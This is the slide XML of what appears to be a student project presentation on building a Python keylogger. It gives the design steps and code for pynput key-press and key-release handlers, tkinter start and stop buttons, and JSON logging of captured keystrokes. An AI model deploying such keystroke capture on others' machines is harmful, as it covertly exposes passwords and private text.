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146847057" r:id="rId11"/>
    <p:sldId id="2146847056" r:id="rId12"/>
    <p:sldId id="2146847058" r:id="rId13"/>
    <p:sldId id="2146847059" r:id="rId14"/>
    <p:sldId id="267"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echtrainer20/TNSDC"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Abarna. S-DMI College of Engineering-CSE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4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_button</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427568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217EB18E-F36B-BAB8-92C6-091777CD090A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="3419952"/>
          </a:xfr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76C3269-0D7A-17C2-D822-5884435F5765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904352" y="1692540"/>
            <a:ext cx="7487695" cy="752580"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB5EA8F-F50B-1E11-52F4-887FED8BD6F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720801" y="3458124"/>
            <a:ext cx="11250407" cy="1563408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1253651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01232" y="0"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">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r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>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8649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 </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323232"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="629435" lvl="1" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">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909017" y="233938"/>
            <a:ext cx="11613485" cy="5563973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">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lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</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	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79AA4E7-85AF-72DB-4B94-9A9564A5037E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="581192" y="1092492"/>
            <a:ext cx="11319702" cy="389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74151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger: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374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Design the GUI: Create a simple GUI using </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> that includes a start and stop button.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374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to capture the key presses and releases.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374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to generate a JSON file that contains the</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solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> keylogging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374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.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rgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>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rgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.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0989" y="477169"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D2CAA7-F4E8-6644-E8A9-8772F0FE4AD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>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18429" y="-431231"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D27194DB-493F-D985-D240-687AA113207F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955279" cy="4667901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4002441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632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Initialize the variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155146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078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
